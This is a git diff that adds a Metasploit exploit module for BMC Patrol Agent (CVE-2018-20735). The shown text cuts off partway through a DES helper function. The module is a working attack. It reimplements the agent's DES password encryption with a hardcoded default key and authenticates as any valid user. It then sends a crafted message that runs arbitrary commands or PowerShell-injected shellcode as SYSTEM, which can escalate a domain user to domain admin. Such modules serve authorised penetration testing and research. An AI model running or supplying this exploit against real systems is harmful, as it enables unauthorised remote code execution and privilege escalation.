diff --git a/exploits/multiple/remote/46556.rb b/exploits/multiple/remote/46556.rb
new file mode 100755
index 000000000..fbcca456a
--- /dev/null
+++ b/exploits/multiple/remote/46556.rb
@@ -0,0 +1,1133 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Powershell + + @deflater = nil + @inflater = nil + + SBOXES = [ + 0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0, + 0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000, + 0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000, + 0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000, + 0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0, + 0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002, + 0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800, + 0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000, + 0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002, + 0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000, + 0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002, + 0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004, + 0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000, + 0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004, + 0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000, + 0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004, + 0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 
0x2200000, 0x0, 0x4, 0x0, + 0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004, + 0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004, + 0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004, + 0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004, + 0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000, + 0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0, + 0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400, + 0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000, + 0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400, + 0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0, + 0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400, + 0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000, + 0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000, + 0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001, + 0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001, + 0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001, + 0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001, + 0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000, + 0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000, + 0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002, + 0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000, + 0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 
0x40002, 0x0, 0x2, 0x40002, + 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000, + 0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002, + 0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110, + 0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000, + 0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000, + 0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110, + 0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000, + 0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000, + 0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110, + 0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110, + 0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0, + 0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008, + 0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000, + 0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000, + 0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000, + 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110, + 0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 
0x80110, 0x80000, 0x0, 0x80000, + 0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110, + 0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110, + 0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110, + 0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110, + 0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000, + 0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000, + 0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000, + 0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008, + 0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800, + 0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000, + 0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800, + 0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801, + 0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1, + 0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800, + 0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400, + 0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400, + 0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000, + 0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400, + 0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 
0x10000400, 0x400, 0x400, 0x10000000, + 0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000, + 0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, + 0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220, + 0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220, + 0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220, + 0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220, + 0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000, + 0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220, + 0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000, + 0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0, + 0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220 + ].freeze + + PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\ + "\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\ + "\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\ + "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze + + PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\ + "\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\ + "\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\ + "\x23\x1C\x1F".freeze + + SBOX_BYTE_ORDER = [ + 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, + 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, + 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, + 0x40000000, 0x80000000 + ].freeze + + ROTATIONS = 
"\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze + INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze + INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze + + DES_ENCRYPT = 0 + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution', + 'Description' => %q( + This module leverages the remote command execution feature provided by + the BMC Patrol Agent software. It can also be used to escalate privileges + on Windows hosts as the software runs as SYSTEM but only verfies that the password + of the provided user is correct. This also means if the software is running on a + domain controller, it can be used to escalate from a normal domain user to domain + admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses + powershell to execute the payload. The powershell version tends to timeout on + the first run so it may take multiple tries. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'b0yd' # @rwincey / Vulnerability Discovery and MSF module author + ], + 'References' => + [ + ['CVE', '2018-20735'], + ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/'] + ], + 'Platform' => ['win', 'linux'], + 'Targets' => + [ + [ + 'Windows Powershell Injected Shellcode', { + 'Platform' => 'win' + } + ], + [ + 'Generic Command Callback', { + 'Arch' => ARCH_CMD, + 'Platform' => %w[linux unix win] + } + ] + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'DisablePayloadHandler' => true + }, + 'DisclosureDate' => 'Jan 17 2019')) + + register_options( + [ + Opt::RPORT(3181), + OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']), + OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']), + OptString.new('CMD', [false, 'command to run on the target. 
If this option is specified the payload will be ignored.']) + ] + ) + + end + + def cleanup + disconnect + print_status("Disconnected from BMC Patrol Agent.") + @inflater.close + @deflater.close + super + end + + def get_target_os(srv_info_msg) + lines = srv_info_msg.split("\n") + fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}" + + os = nil + ver = nil + lines[2..-2].each do |i| + val = i.split("=") + if val.length == 2 + if val[0].strip! == "T" + os = val[1] + elsif val[0].strip! == "VER" + ver = val[1] + end + end + end + [os, ver] + end + + def get_cmd_output(cmd_output_msg) + + lines = cmd_output_msg.split("\n") + fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}" + + # Parse out command results + idx_start = cmd_output_msg.index("Result\x00") + idx_end = cmd_output_msg.index("RemPsl_user") + output = cmd_output_msg[idx_start + 7..idx_end - 1] + + output + end + + def exploit + + # Manually start the handler if not running a single command + if datastore['CMD'].nil? || datastore['CMD'].empty? + + # Set to nil if the cmd is empty for checks further down + datastore['CMD'] = nil + datastore['DisablePayloadHandler'] = false + + # Configure the payload handler + payload_instance.exploit_config = { + 'active_timeout' => 300 + } + # Setup the payload handler + payload_instance.setup_handler + + # Start the payload handler + payload_instance.start_handler + + end + + # Initialize zlib objects + @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY) + @inflater = Zlib::Inflate.new + + # Connect to the BMC Patrol Agent + connect + print_status("Connected to BMC Patrol Agent.") + + # Create session msg + create_session + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil? 
+ + # Authenticate + authenticate_user(datastore['USER'], datastore['PASSWORD']) + + # Receive the authentication response + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil? + + ret_msg = process_response(ret_data) + if ret_msg =~ /logged in/ + print_status("Successfully authenticated user.") + else + fail_with(Failure::UnexpectedReply, "Login failed. Aborting.") + end + + # Receive the server info + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil? + srv_info = process_response(ret_data) + + # Get the target's OS from their info msg + target_os = get_target_os(srv_info) + + # When using autotargeting, MSF selects the Windows meterpreter as the default payload. + # Fail if this is the case and ask the user to select an appropriate payload. + if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil? + fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") + end + + target_name = target.name + if !datastore['CMD'].nil? + command = datastore['CMD'].tr('"', '\"') + print_status("Command to execute: #{command}") + elsif target_name == 'Windows Powershell Injected Shellcode' + # Get encoded powershell of payload + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection') + else + command = payload.raw.tr('"', '\"') + end + + # Run command + run_cmd(command) + + # Receive command confirmation + ret_data = receive_msg + if !ret_data.nil? + process_response(ret_data) + end + + # Receive command output + ret_data = receive_msg + if !ret_data.nil? && !datastore['CMD'].nil? 
+ cmd_result_data = process_response(ret_data) + cmd_result = get_cmd_output(cmd_result_data) + print_status("Output:\n#{cmd_result}") + end + + # Handle the shell + handler + + end + + def receive_msg + + header = sock.get_once(6) + if header.nil? + return + end + + payload_size_arr = header[0, 4] + payload_size = payload_size_arr.unpack1("N") + payload = '' + if payload_size > 0 + payload = sock.get_once(payload_size) + if payload.nil? + return + end + end + + return header + payload + + end + + def send_msg(type, compression, data) + + data_len = data.length + buf = [data_len].pack('N') + + # Set the type + buf += [type].pack('C') + + # Set compression flag + buf += [compression].pack('C') + + # Add data + buf += data + + # Send msg + sock.put(buf) + + end + + def process_response(ret_data) + + # While style checks complain, I intend to leave this parsing + # in place for debugging purposes + ret_size_arr = ret_data[0, 4] + ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment + + msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment + comp_flag = ret_data[5, 1] + + payload_data = ret_data[6..-1] + if comp_flag == "\x00" + bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment + payload_data = @inflater.inflate(payload_data) + end + + return payload_data + + end + + def run_cmd(cmd) + + user_num = rand 1000..9999 + msg_1 = %(R_E +{ +\tRE_ID=1 +\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num} +\tRE_ORG=PemApi +\tRE_SEV=1 +\tRE_NSEV=5 +\tRE_ST= +} +) + + msg_1 += "\x00" + # Compress the message + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def identify(user) + + inner_len = 15 + msg_type = 8 + len_str = [inner_len].pack("N") + msg_str = [msg_type].pack("N") + msg_1 = %(PEM_MSG +{ +\tNSDL=#{inner_len} +\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00 +} +) + msg_1 += "\x00" + print_status("Msg: #{msg_1}") + bin_data = msg_1.unpack1("H*") # 
rubocop:disable Lint/UselessAssignment + # Compress the message + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def create_session + sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00" + sess_msg += "\x00" * 0x68 + send_msg(0x45, 0x2, sess_msg) + end + + def authenticate_user(user, password) + # Default encryption key + enc_key = 'k$C4}@"_' + output_data = des_crypt_func(password, enc_key, DES_ENCRYPT) + # Convert to hex string + encrpted_pw = output_data.unpack1("H*") + des_pw = encrpted_pw.upcase + + msg_1 = %(ID +{ +\tHOST=user +\tUSER=#{user} +\tPASS=#{des_pw} +\tVER=V9.6.00 +\tT=PEMAPI +\tHTBT=1 +\tTMOT=1728000 +\tRTRS=3 +} +) + + msg_1 += "\x00" + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def rotate_block_init(input_block_tuple) + + v6 = 0 + v5 = 0 + input_block_tuple = input_block_tuple.pack("V*").unpack("i*") + v3 = input_block_tuple[0] + v4 = input_block_tuple[1] + + if (v4 & 0x2000000) != 0 + v5 = 1 + end + if (v4 & 0x20000) != 0 + v5 |= 2 + end + if (v4 & 0x200) != 0 + v5 |= 4 + end + if (v4 & 2) != 0 + v5 |= 8 + end + if (v3 & 0x2000000) != 0 + v5 |= 0x10 + end + if (v3 & 0x20000) != 0 + v5 |= 0x20 + end + if (v3 & 0x200) != 0 + v5 |= 0x40 + end + if (v3 & 2) != 0 + v5 |= 0x80 + end + if (v4 & 0x8000000) != 0 + v5 |= 0x100 + end + if (v4 & 0x80000) != 0 + v5 |= 0x200 + end + if (v4 & 0x800) != 0 + v5 |= 0x400 + end + if (v4 & 8) != 0 + v5 |= 0x800 + end + if (v3 & 0x8000000) != 0 + v5 |= 0x1000 + end + if (v3 & 0x80000) != 0 + v5 |= 0x2000 + end + if (v3 & 0x800) != 0 + v5 |= 0x4000 + end + if (v3 & 8) != 0 + v5 |= 0x8000 + end + if (v4 & 0x20000000) != 0 + v5 |= 0x10000 + end + if (v4 & 0x200000) != 0 + v5 |= 0x20000 + end + if (v4 & 0x2000) != 0 + v5 |= 0x40000 + end + if (v4 & 0x20) != 0 + v5 |= 0x80000 + end + if (v3 & 0x20000000) != 0 + v5 |= 0x100000 
+ end + if (v3 & 0x200000) != 0 + v5 |= 0x200000 + end + if (v3 & 0x2000) != 0 + v5 |= 0x400000 + end + if (v3 & 0x20) != 0 + v5 |= 0x800000 + end + if (v4 < 0) + v5 |= 0x1000000 + end + if (v4 & 0x800000) != 0 + v5 |= 0x2000000 + end + if (v4 & 0x8000) != 0 + v5 |= 0x4000000 + end + if (v4 & 0x80) != 0 + v5 |= 0x8000000 + end + if (v3 < 0) + v5 |= 0x10000000 + end + if (v3 & 0x800000) != 0 + v5 |= 0x20000000 + end + if (v3 & 0x8000) != 0 + v5 |= 0x40000000 + end + if (v3 & 0x80) != 0 + v5 |= 0x80000000 + end + if (v4 & 0x1000000) != 0 + v6 = 1 + end + if (v4 & 0x10000) != 0 + v6 |= 2 + end + if (v4 & 0x100) != 0 + v6 |= 4 + end + if (v4 & 1) != 0 + v6 |= 8 + end + if (v3 & 0x1000000) != 0 + v6 |= 0x10 + end + if (v3 & 0x10000) != 0 + v6 |= 0x20 + end + if (v3 & 0x100) != 0 + v6 |= 0x40 + end + if (v3 & 1) != 0 + v6 |= 0x80 + end + if (v4 & 0x4000000) != 0 + v6 |= 0x100 + end + if (v4 & 0x40000) != 0 + v6 |= 0x200 + end + if (v4 & 0x400) != 0 + v6 |= 0x400 + end + if (v4 & 4) != 0 + v6 |= 0x800 + end + if (v3 & 0x4000000) != 0 + v6 |= 0x1000 + end + if (v3 & 0x40000) != 0 + v6 |= 0x2000 + end + if (v3 & 0x400) != 0 + v6 |= 0x4000 + end + if (v3 & 4) != 0 + v6 |= 0x8000 + end + if (v4 & 0x10000000) != 0 + v6 |= 0x10000 + end + if (v4 & 0x100000) != 0 + v6 |= 0x20000 + end + if (v4 & 0x1000) != 0 + v6 |= 0x40000 + end + if (v4 & 0x10) != 0 + v6 |= 0x80000 + end + if (v3 & 0x10000000) != 0 + v6 |= 0x100000 + end + if (v3 & 0x100000) != 0 + v6 |= 0x200000 + end + if (v3 & 0x1000) != 0 + v6 |= 0x400000 + end + if (v3 & 0x10) != 0 + v6 |= 0x800000 + end + if (v4 & 0x40000000) != 0 + v6 |= 0x1000000 + end + if (v4 & 0x400000) != 0 + v6 |= 0x2000000 + end + if (v4 & 0x4000) != 0 + v6 |= 0x4000000 + end + if (v4 & 0x40) != 0 + v6 |= 0x8000000 + end + if (v3 & 0x40000000) != 0 + v6 |= 0x10000000 + end + if (v3 & 0x400000) != 0 + v6 |= 0x20000000 + end + if (v3 & 0x4000) != 0 + v6 |= 0x40000000 + end + if (v3 & 0x40) != 0 + v6 |= 0x80000000 + end + + # Create return tuple + 
ret_block = Array.new + ret_block.push v5 + ret_block.push v6 + ret_block + end + + def rotate_block_final(input_block_tuple) + + v6 = 0 + v5 = 0 + input_block_tuple = input_block_tuple.pack("V*").unpack("i*") + v3 = input_block_tuple[0] + v4 = input_block_tuple[1] + + if (v4 & 0x80) != 0 + v5 = 1 + end + if (v3 & 0x80) != 0 + v5 |= 2 + end + if (v4 & 0x8000) != 0 + v5 |= 4 + end + if (v3 & 0x8000) != 0 + v5 |= 8 + end + if (v4 & 0x800000) != 0 + v5 |= 0x10 + end + if (v3 & 0x800000) != 0 + v5 |= 0x20 + end + if (v4 < 0) + v5 |= 0x40 + end + if (v3 < 0) + v5 |= 0x80 + end + if (v4 & 0x40) != 0 + v5 |= 0x100 + end + if (v3 & 0x40) != 0 + v5 |= 0x200 + end + if (v4 & 0x4000) != 0 + v5 |= 0x400 + end + if (v3 & 0x4000) != 0 + v5 |= 0x800 + end + if (v4 & 0x400000) != 0 + v5 |= 0x1000 + end + if (v3 & 0x400000) != 0 + v5 |= 0x2000 + end + if (v4 & 0x40000000) != 0 + v5 |= 0x4000 + end + if (v3 & 0x40000000) != 0 + v5 |= 0x8000 + end + if (v4 & 0x20) != 0 + v5 |= 0x10000 + end + if (v3 & 0x20) != 0 + v5 |= 0x20000 + end + if (v4 & 0x2000) != 0 + v5 |= 0x40000 + end + if (v3 & 0x2000) != 0 + v5 |= 0x80000 + end + if (v4 & 0x200000) != 0 + v5 |= 0x100000 + end + if (v3 & 0x200000) != 0 + v5 |= 0x200000 + end + if (v4 & 0x20000000) != 0 + v5 |= 0x400000 + end + if (v3 & 0x20000000) != 0 + v5 |= 0x800000 + end + if (v4 & 0x10) != 0 + v5 |= 0x1000000 + end + if (v3 & 0x10) != 0 + v5 |= 0x2000000 + end + if (v4 & 0x1000) != 0 + v5 |= 0x4000000 + end + if (v3 & 0x1000) != 0 + v5 |= 0x8000000 + end + if (v4 & 0x100000) != 0 + v5 |= 0x10000000 + end + if (v3 & 0x100000) != 0 + v5 |= 0x20000000 + end + if (v4 & 0x10000000) != 0 + v5 |= 0x40000000 + end + if (v3 & 0x10000000) != 0 + v5 |= 0x80000000 + end + if (v4 & 8) != 0 + v6 = 1 + end + if (v3 & 8) != 0 + v6 |= 2 + end + if (v4 & 0x800) != 0 + v6 |= 4 + end + if (v3 & 0x800) != 0 + v6 |= 8 + end + if (v4 & 0x80000) != 0 + v6 |= 0x10 + end + if (v3 & 0x80000) != 0 + v6 |= 0x20 + end + if (v4 & 0x8000000) != 0 + v6 |= 0x40 + end 
+ if (v3 & 0x8000000) != 0 + v6 |= 0x80 + end + if (v4 & 4) != 0 + v6 |= 0x100 + end + if (v3 & 4) != 0 + v6 |= 0x200 + end + if (v4 & 0x400) != 0 + v6 |= 0x400 + end + if (v3 & 0x400) != 0 + v6 |= 0x800 + end + if (v4 & 0x40000) != 0 + v6 |= 0x1000 + end + if (v3 & 0x40000) != 0 + v6 |= 0x2000 + end + if (v4 & 0x4000000) != 0 + v6 |= 0x4000 + end + if (v3 & 0x4000000) != 0 + v6 |= 0x8000 + end + if (v4 & 2) != 0 + v6 |= 0x10000 + end + if (v3 & 2) != 0 + v6 |= 0x20000 + end + if (v4 & 0x200) != 0 + v6 |= 0x40000 + end + if (v3 & 0x200) != 0 + v6 |= 0x80000 + end + if (v4 & 0x20000) != 0 + v6 |= 0x100000 + end + if (v3 & 0x20000) != 0 + v6 |= 0x200000 + end + if (v4 & 0x2000000) != 0 + v6 |= 0x400000 + end + if (v3 & 0x2000000) != 0 + v6 |= 0x800000 + end + if (v4 & 1) != 0 + v6 |= 0x1000000 + end + if (v3 & 1) != 0 + v6 |= 0x2000000 + end + if (v4 & 0x100) != 0 + 